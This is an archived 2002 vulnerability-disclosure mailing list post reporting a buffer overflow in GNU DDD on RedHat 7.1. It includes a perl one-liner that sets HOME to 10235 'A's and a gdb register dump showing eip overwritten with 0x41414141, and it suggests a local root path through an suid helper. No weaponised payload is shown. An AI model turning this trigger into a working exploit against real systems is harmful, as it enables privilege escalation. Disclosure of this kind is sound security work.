Vulnerability Development mailing list archives

ddd smashed

From: l0rt <simon () snosoft com>
Date: 15 Jan 2002 15:28:21 -0500

Werd...
========================================================================
Program  : ddd
OS       : Linux
DISTRO   : RedHat 7.1
Issue    : 0x41414141 (no core tho)
Home Page: http://www.gnu.org/software/ddd/
suid     : No
sgid     : No
Issue    : ddd may be called by an suid helper binary and could be        
exploited to gain local root access.

GNU DDD, the Data Display Debugger, is a GUI to command-line debuggers
like GDB, DBX, JDB, XDB, Ladebug, WDB, the Perl debugger, or the Python
debugger. It provides a graphical data display where complex data
structures can be explored incrementally and interactively.
========================================================================

Normally I use gdb to debug cores but today I decided to try ddd and my
efforts failed.  When I set the $HOME in my test account to 10235 A's
and I tried to run ddd like (I found an evolution core that will be
explained in my next post):


sh-2.04$ export HOME=`perl -e'print "A" x 10235'`
sh-2.04$ ddd /usr/bin/evolution

I get a bunch of A's that spew to my console and then some memory access
errors as seen below:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... blah blah...
/.ddd/themes/" failed: File name too long
/tmp/dddNhatCp:3: Error in sourced command file:
Cannot access memory at address 0x41414141
<ctrl-c>

So... in light of this... I decided to use gdb to debug ddd which uses
gdb.. heh...  


Here is a dump of the registers...


eax            0x8572ec4        139931332
ecx            0x0      0
edx            0xbfffbc20       -1073759200
ebx            0x41414141       1094795585
esp            0xbfffbc20       0xbfffbc20
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x120    288
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x400bf242       1074524738
foseg          0x2b     43
fooff          0xbfffac86       -1073763194
fop            0x6a     106


smashed ;o)


-- 

-l0rt-
        
        Secure Network Operations
        Strategic Reconnaissance Team
        Team Key ID: ACFCBD01
        l0rt Key ID: 47BF3F87
        ------------------------------------------
        "That secret you've been guarding, isn't."

Attachment: _bin
Description:

Current thread:

ddd smashed l0rt (Jan 15)
- Re: ddd smashed Pavel Kankovsky (Jan 16)
  - Re: ddd smashed l0rt (Jan 16)
    - Re: ddd smashed Pavel Kankovsky (Jan 16)
    - Re: ddd smashed l0rtamus Prime (Jan 16)